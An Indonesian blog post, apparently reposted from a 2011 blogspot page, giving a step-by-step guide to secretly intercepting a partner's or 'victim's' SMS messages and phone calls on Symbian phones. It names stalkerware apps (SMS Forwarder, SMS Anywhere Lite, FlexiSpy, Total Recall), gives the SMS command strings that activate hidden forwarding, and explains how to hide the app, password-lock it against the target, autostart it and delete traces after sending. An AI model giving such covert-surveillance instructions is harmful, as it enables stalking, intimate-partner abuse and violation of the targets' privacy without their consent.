Contact Us

Name

Email *

Message *

Cara Mudah Menyadap SMS dan Telepon

Cara Mudah Menyadap SMS dan Telepon

Cara Mudah Menyadap SMS dan Telepon
Berikut saya share beberapa cara mudah untuk menyadap SMS dan Telepon sang Koruptor  (Kekasih, ORang rUmah, Pejabat, dan orang kanTOR), emang cuma KPK dan Polri saja yang bisa maen sadap menyadap, orang biasa seperti kita juga pasti bisa asal ada kemauan.
Apalagi yang namanya sadap menyadap, hanya membutuhkan sedikit keahlian dan kebohongan untuk melakukannya.
Ada beberapa cara yang dapatkita lakukan namun untuk kali ini saya hanya mau share cara yang termudah, tidak dengan membobol server operator seperti yang biasa saya lakukan, tapi cukup dengan menggunakan beberapa aplikasi HP tambahan yang dapat dengan mudah di instal dan digunakan.
Aplikasi sadap ini dapat digunakan untuk menyadap SMS dan Telpon sang Koruptor, sebelumnya silahkan di download dulu ketiga aplikasi yang akan digunakan untuk menyadap SMS maupun Telponnya ya..
Cara Mudah Menyadap SMS dan Telepon
Download SMS anywhere.sis
Download SMS Forwarder.zip
Download total recall.zip

Cara I :

Cara Mudah Menyadap SMS dan Telepon
Cara kerja SMS Forwarder adalah memforward setiap sms yang masuk ke nomer hp yang sudah diinstal aplikasi ini ke nomer hape kita.
Jadi setiap sms yang masuk ke nomer itu akan diforward ke nomer kita.

Karena sistem aplikasi ini akan meneruskan sms ,tentu saja si pemilik hape nya akan terkena pulsa juga setiap sms yang di forward ke nomer kita.Tapi ini mungkin tak jadi masalah karena tarif sms sekarang sudah makin murah.
Sms yang diforward ke kita akan terekam di laporan pengiriman.
Untuk itu maka kita juga harus seting laporan pengiriman agar tidak aktif.

Karena aplikasi ini sangat jahat ( ) karena akan membuka privasi orang,maka gunakan lah dengan bijak.aktifkan saja bila perlu,mungkin satu minggu sekali untuk menguji kesetiaan pasangan kita.
Cara Mudah Menyadap SMS dan Telepon
Dan supaya fair,kita juga bisa secara terus terang kepada pacar kita kalau mau memasang aplikasi ini.tentu saja di hape kita juga harus terinstal juga.jadi kita bisa saling terbuka .bukankah itu jadi lebih baik??

Dalam file zip ini ada 2 buah aplikasi.
*SMS forwarder lite.sis untuk hp symbian s60 2nd (eg: nokia 3230,nokia 6600,nokia 6670,nokia 7610,dsb)

cara II

Syarat Umum :
HP berbasis symbian (kedua HP)
Merek NOKIA tipe: N70, N90, 6681, 6682, 6670, 6630, 3230, 6260, 7610, 6620, 6600 dan 6680, N71, N80, N92, E60, E61, E70, 3250, N91, dan tipe-tipe terbaru.
Memiliki aplikasi symbian “smsanywherelite.sis”

Ikuti Langkah berikut:

1) Menyadap SMS,


Langkah yang harus dilakukan :

- Download aplikasi HP smsanywherelite.sis untuk software menyadap
Cara Mudah Menyadap SMS dan Telepon
- Masukkan aplikasi symbian itu di HP anda dan teman anda

- Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

- Siapkan HP korban

- Siapkan HP anda yang akan menerima sms masuk dari korban anda
Cara Mudah Menyadap SMS dan Telepon
- Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON -. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.

- Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0

- Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya.

2) Menyadap SMS dan Telepon

- Siapkan kedua HP (HP anda dan korban)

- Persiapan kedua adalah terhubung dengan server proxyspy (www.proxyspy.com). Setelah terjadi hubungan dengan server proxyspy sekarang Anda bisa mensetting parameter koneksinya ke dalam ponsel dengan menggunakan kode XXX yang tadi sudah didapatkan. Jika sudah, sekarang saatnya Anda mensetting juga parameter GPRS yang harus Anda sesuaikan dengan operatornya.

- Setting sistem pelaporan. Pada setting pelaporan ini, Anda harus mencatat kejadian yang ingin dilaporkan. Misalnya dalam 1 jam Anda menset maksimal 30 sms. Itu berarti dalam 1 jam Anda bisa menerima laporan penyadapan sms sebanyak 30 kali. Berbicara masalah penyadapan ini, Anda bukan hanya bisa menyadap sms saja, melainkan juga bisa menyadap telepon, akses GPRS dan juga koneksi MMA, seru kan?

- Hubungkan ponsel dengan server, kemudian klik start capture dan pilih yes. Selanjutnya semua data yang bisa diintip bisa diketahui melalui daftar kontak nama yang pernah Anda hubungi sejak layanan ini Anda pakai. Jika sudah dilakukan, maka langkah terakhir adalah menikmati hasil penyadapan

- Langkah melihat hasil penyadapan.

Anda harus login melalui website flexispy (www.flexispy.com), setelah itu nikmati hasil penyadapan Anda. Yah benar Anda bisa melihat lebih lengkap disini sesuai setting awal. Di sini Anda bisa melihat data yang menampilkan isi sms, mms, akses GPRS dan history telepon, bahkan juga nomor IMEI. Disamping menampilkan data, Anda juga bisa mendownload tampilan yang tersedia disana. Sebagai tambahan informasi, proxyspy bukanlah program trojan maupun virus, karena ini bisa kita remove sewaktu-waktu jika dirasa sudah tidak dibutuhkan lagi. Flexispy hanyalah software pemonitor aktivitas seseorang yang dipasang di ponsel.

Cara III Sadap Telepon

PRINSIP SADAP TELPON

Trik sadap ini menggunakan fitur auto send dari aplikasi total recall yang sejatinya untuk merekam pembicaraan. Jadi telpon pacarmu direkam, lalu otomatis hasil rekamannya dikirim ke ponselmu. Tentu cara ini bs dilakukan jika hp pacarmu adalah hp symbian.
Cara Mudah Menyadap SMS dan Telepon
TUTORIAL SADAP TELPON

Berikut langkah-langkah menyadap telponnya.

Install total recall di hape pacarmu, lalu jalankan aplikasi, pilih setting
Cara Mudah Menyadap SMS dan Telepon

Lalu kamu set pasword protection ke yes , lalu kode pasword sesuai keinginan. Ini dimaksudkan agar jika pacarmu ga bs buka aplikasinya tanpa pasword kalau ketahuan. Jangan lupa Autostart set ke Yes agar aplikasi tetap bekerja walau hape di mati-hidupkan.

Cara Mudah Menyadap SMS dan Telepon
Set Email/MMS ke no hape untuk MMS, atau ke alamat email untuk MMS, ini adalah tempat hasil sadapan telpon akan dikirim.

Cara Mudah Menyadap SMS dan Telepon
Set juga auto send ke Email/MMS sesuai setingan sebelumnya



TIPS
Cara termudah adalah kirim via mms, tp ini kena kendala di biaya, 1 mms bisa Rp.1250 per 100kb, artinya jika nelpon 1 menit kira2 kena 1250, kalo 5 menit bisa 5rb lebih kan. 
Cara paling bijaksana adalah via email, karena 7 detik percakapan cm 6 kb (amr), artinya percakapan 5 menit kurang lebih 300kb, atau kira2 cm Rp.300-Rp.900, tergantung operator.
Cara Mudah Menyadap SMS dan Telepon
Coba saya test nelpon operator 123 selama 7 detik, dan hasil sadapan sudah saya terima di email hape saya dalam waktu kurang dari 1 menit.


Mudah kan! Tapi sebelum kamu lakukan hal diatas, pastikan hape pacarmu sudah terseting email. Kalo malas seting email, gunakan MMS saja. 
Jika kamu ingin menerima sadapan langsung dihapemu, seting jg email di ponselmu spt cara.

Langsung saja, aplikasi total recall versi 3.14 bisa di DOWNLOAD DISINI . Atau bisa kamu pake total recall versi 4 download
Cara Mudah Menyadap SMS dan Telepon
Versi 4 memiliki fitur lebih baik tentunya, diantaranya adalah delete after send


Yang disadap bisa cuma no tertentu atau diluar nomer yg didaftarkan.

Cara Mudah Menyadap SMS dan Telepon
Oke, selamat mencoba.
sumber : http://wahanacorp.blogspot.com/2011/11/cara-mudah-menyadap-sms-dan-telepon.html
Baca Juga



Back To Top